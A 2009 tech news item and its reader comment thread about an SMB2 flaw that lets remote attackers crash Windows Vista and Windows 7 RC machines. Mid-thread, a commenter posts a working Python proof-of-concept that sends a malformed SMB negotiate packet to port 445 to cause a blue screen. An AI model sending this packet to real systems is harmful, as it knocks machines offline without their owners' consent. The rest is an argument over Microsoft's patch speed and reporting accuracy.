Security experts warned Tuesday that a vulnerability in Microsoft's implementation of the SMB2 protocol can be exploited via the net to crash or reboot Windows Vista and Windows 7 systems. An exploit written in Python is already available and being tested by security experts. Initial tests by heise security indicate the exploit enabled a remote reboot of a Vista system. However, in the test, the exploit had no apparent effect on a computer running Windows 7 RTM.
Microsoft has yet to acknowledge the issue and release an official update. The only current workaround is to close the SMB ports by un-ticking the boxes for file and printer access in the firewall settings.
Update: Microsoft has confirmed that Windows 7 RC is affected by the flaw but Windows 7 RTM is not.
According to the original article, Server 2008 may be vulnerable as well (currently untested), but Win 2000 and XP are not (don't have SMB2).
-------------------------
Vista/Windows 7 All (64b/32b|SP1/SP2 fully updated) and possibly Win Server
2008 (not tested)
as it use the same SMB2.0 driver.
http://www.microsoft.com/technet/security/...ory/975497.mspx
Why you say Flow in Windows 7 then ?!
Last edited by Mathiasdm on 08 Sep 2009 - 17:50
However, knowing Microsoft's bug fix response time... it may take a year or two...
However, knowing Microsoft's bug fix response time... it may take a year or two...
LOL what? Microsoft has the fastest critical bug fix time in the industry
Go troll somewhere else
However, knowing Microsoft's bug fix response time... it may take a year or two...
I guess Patch Tuesday just doesn't exist.
However, knowing Microsoft's bug fix response time... it may take a year or two...
ROFLCOPTER
Maybe I was a bit harsh though.
Statistically proven by a company paid for by Microsoft, but don't let that stop you believing in it whole heartedly, and trotting it out whenever you can. Spyglass/IE is the most insecure browser out there, but maybe 8 isn't as bad as the previous versions. They still have a long way to go to even approach some of the security improvements of chrome.
Go troll somewhere else
You would do well heading your own advice:
Sometimes Microsoft are quite good at fixing vulnerabilities, sometimes they are not. Sticking your head in the sand and ignoring the facts doesn't help anyone. Microsoft are a big company, and produce a lot of products, it is not a simple bug fix to fix some of these issues. On top of that, they need loads of testing to make sure they haven't broken anything else.
Except, the office, 360, game studios, hardware, etc teams do not deal with Windows bugs...the Windows team does.
If the bug is deemed critical enough and the patch is released as an emergency patch, then the testing done on is very little. And the patch is released as fast as it possibly can.
So like I said, compared to any other company microsoft's average bug fixing time is the fastest in the industry.
And btw about your little TCP vulnerability post:
A sockstress style exploit also needs access to raw sockets on the attacking machine because the packets must be handled in userspace rather than with the OS's connect() API. Since raw sockets are disabled on Windows XP SP1 and above, the exploit's usability is limited to those on other platforms with raw sockets such as *nix
---
Except, IE7/8 on vista and 7 run by default in protected mode ( sandbox ). So unless you explicitly allow it, a bug or a virus, cannot do any harm to the system. Ie7 and 8 already run each tab in a seperate process and with DEP enabled (by default) code cannot be injected at all, regardless of where it came from.
Yes I know chrome also has this, but it was done by partially reverse engineering the windows kernel, and IE had it first.
Now if you were to download a virus/trojan w/e and then run it as administrator...you're screwed no matter what browser you use.
Last edited by /- Razorfold on 09 Sep 2009 - 02:45
Last edited by GreyWolfSC on 08 Sep 2009 - 19:09
A mere nuisance? Maybe you think having your computer reboot every 10 minutes is fine?
Hopefully Microsoft will fix this soon, although it has been around for years.
Still needs to be fixed ASAP, and will undoubtedly be patched before 10-22.
Yeah, undoubtedly, even though it has been around for years.
I still don't see Microsoft taking security seriously, when they let stuff like this through.
So, that is your excuse for making stuff up? I didn't say linux, or mac os was perfect, as has been seen by the Mac OS coming with a flawed version of Flash. No OS if perfect, but people running around here, making excuses for Microsoft, talking trash about how they are the fastest at fixing bugs, are making themselves just look silly.
Oh because proof is always silly:
http://arstechnica.com/apple/news/2008/04/...sun-slowest.ars
Done with your trolling yet?
# Tested on : Windows Vista SP2 full updated - US-en
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it
dies with a
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
This could end up being massively exploited. If running the affected version of Windows people should close this port in their firewalls: 445
99% of users don't have SMB mapped through their routers, and when on a public network Vista/7 disables fire sharing, so this really isn't that big of an issue.
The last 1% is actually a lot of users as Microsoft has sold 100+ million copies of Vista. Though the actual number of Vista users is unknown, 1% could possibly effect 1 million users. I guess we'll have to for Microsoft to respond to this.
They may have "sold" 100 million copies of Vista, but how many people upgraded to XP from that? That is something that Microsoft will never tell us. It could be as high as 90%.
And thats a bad thing because? Stop your trolling really
Huh? Okay if you say 90% downgraded to XP that gives it 10 million users still use Vista and 1% of 10 million is what, 100 thousand users? That is still a large amount.
Where'd you pull the number that 90% of Vista users downgrade to XP?
How big is your sample size to come up with that number? What's the average and sigma? What is your data skew? What is the level of confidence in your data? What is the source of your data? How does your data compare with XP when it was released, is there a trend? Can you explain to me what the data tells you after the comparison?
Last edited by kouhii00 on 09 Sep 2009 - 06:17
Where'd you pull the number that 90% of Vista users downgrade to XP?
How big is your sample size to come up with that number? What's the average and sigma? What is your data skew? What is the level of confidence in your data? What is the source of your data? How does your data compare with XP when it was released, is there a trend? Can you explain to me what the data tells you after the comparison?
Can you read? The only people who really know are at Microsoft, and they wont release the numbers. I have no idea what the rate is, but it could be 90%, it could be 1%, it could be anything. But I would guess it is not 1% or Microsoft would be pushing those numbers to any newspaper, tech site, blog or twitter account that they could.
I don't work for Microsoft, despite popular opinion to the contrary.
I don't work for Microsoft, despite popular opinion to the contrary.
Heh..When you throw out numbers people think you have gotten it from somewhere other than Microsoft. The numbers you have mentioned might be small to you but if you take into consideration the mass amount of Vista/Server2008 customers the flaw becomes a big issue. If you don't have the actual numbers with the data to back it up please don't randomly assume.
I never said you are a Microsoft employee and of course Microsoft will never release these numbers. If you are the CEO of Microsoft would you? I know I wouldn't and if some Marketing moron releases these numbers without permission from top management he/she will be fired instantly. Good luck getting another job at another high tech company with that kind of record.
If you worked for Microsoft you may be able to answer my questions as these types of information are not accessible to everyone. In the end Microsoft is still selling it's OS with margins so it is a win win situation; why bother?
Haha, I wish; it was a great game.
Oh well, if it doesn't affect the grey wolf then lets forget about it. No point wasting any more time on this guys, lets pack up and go home.
By any change, do you work for Microsoft in the Quality control deparment?
By any change, do you work for Microsoft in the Quality control deparment?
"Our investigation has shown that Windows Vista, Windows Server 2008 and Windows 7 RC are affected by this vulnerability. Windows 7 RTM, Windows Server 2008 R2, Windows XP and Windows 2000 are not affected by this vulnerability." - Microsoft Security Response Center
http://blogs.technet.com/msrc/archive/2009...7-released.aspx
Actually, you posted "Microsoft's implementation of the SMB2 protocol can be exploited via the net to crash or reboot Windows Vista and Windows 7 systems." The very next sentence, you say it has no effect on Windows 7. So which is it? And where is this 'could' of which you now speak? Oh, that's right, in the sensationalistic title. Next time, can you toss in a 'Maybe', 'kinda' or 'sorta'? That'd really put it over the top.
Talk about sloppy reporting.
Last edited by Mega Goatlord on 08 Sep 2009 - 20:48
Talk about sloppy reporting.
+1
It is either sloppy reporting or intentional misinformation.
And, yes, I think most of us understand the meaning of COULD. You would use COULD if you had some evidence, which in this case, isn't there. If you wanted to hint at the possibility, you should have used may or might...
Shall we expect to see this sort of sloppy headlines till Windows 7 hits the store shelves?
Last edited by zagor on 08 Sep 2009 - 21:52
You're only taking a small part of what he said
The article refers to initial tests only, this doesn't mean that Windows 7 will never be affected in any test/real-world application, this means that under the specific conditions that it tested at Heise Security, Windows 7 was unaffected.
*installs dos*
*adds norton utilities*
*crash*
Your little out-dated XP machine can't do that very well, just keep it in mind.
It shares everything else, except for the GUI, so why wouldn't it. It is version 6.1, not version 7 (how is that for great naming).
Umm no, it has the Windows 7 network stack.
No, it is not. It is version 7, hence being called Windows 7. We changed the GetVersionEx API to return "6.1" for compatibility purposes. This was explained on the E7 blog like a year ago.
So how much has it changed from the one in Vista which it's based upon? You talk as if Windows 7 is a completely new OS. I realize things have been updated and changed, new things introduced, but Windows 7 is still based on Vista. It wasn't written from scratch.
Last edited by Skyfrog on 09 Sep 2009 - 04:37
No OS is written from scratch. Not Ubuntu. Not Linux. Not OSX....
http://blogs.technet.com/msrc/archive/2009...7-released.aspx
---
If that's true then this news needs to be edited.
Before jumping on the train or under the train, better check the validity of the statements.
Before jumping on the train or under the train, better check the validity of the statements.
According to the article and now confirmed by Microsoft, Windows Vista, Windows 7 and Windows Server 2008 are affected by this. Windows 7 RTM isn't affected (this according to Microsoft).
Why is the article published wrong?
Before jumping on the train or under the train, better check the validity of the statements.
According to the article and now confirmed by Microsoft, Windows Vista, Windows 7 and Windows Server 2008 are affected by this. Windows 7 RTM isn't affected (this according to Microsoft).
Why is the article published wrong?
Well, I think people will see what they want to see. Didn't you read the article that you mentioned? It says windows 7 RTM is not effected.
Windows 7 RC is effected. But, that's not the same thing as windows 7 being effected. Windows 7 RC is a beta product.
Thanks Tom for your irresponsible reporting, straight from the horses mouth.
Edit: Just so its final on this board
Our investigation has shown that Windows Vista, Windows Server 2008 and Windows 7 RC are affected by this vulnerability. Windows 7 RTM, Windows Server 2008 R2, Windows XP and Windows 2000 are not affected by this vulnerability.
"Flaw in Windows Vista allows remote reboot; Windows 7 not effected"
Commenting has either been disabled on this article or you are not logged in. Click here to login or register, its free!
Note: Anonymous commenting is disabled in order to keep the quality of responses to a high standard.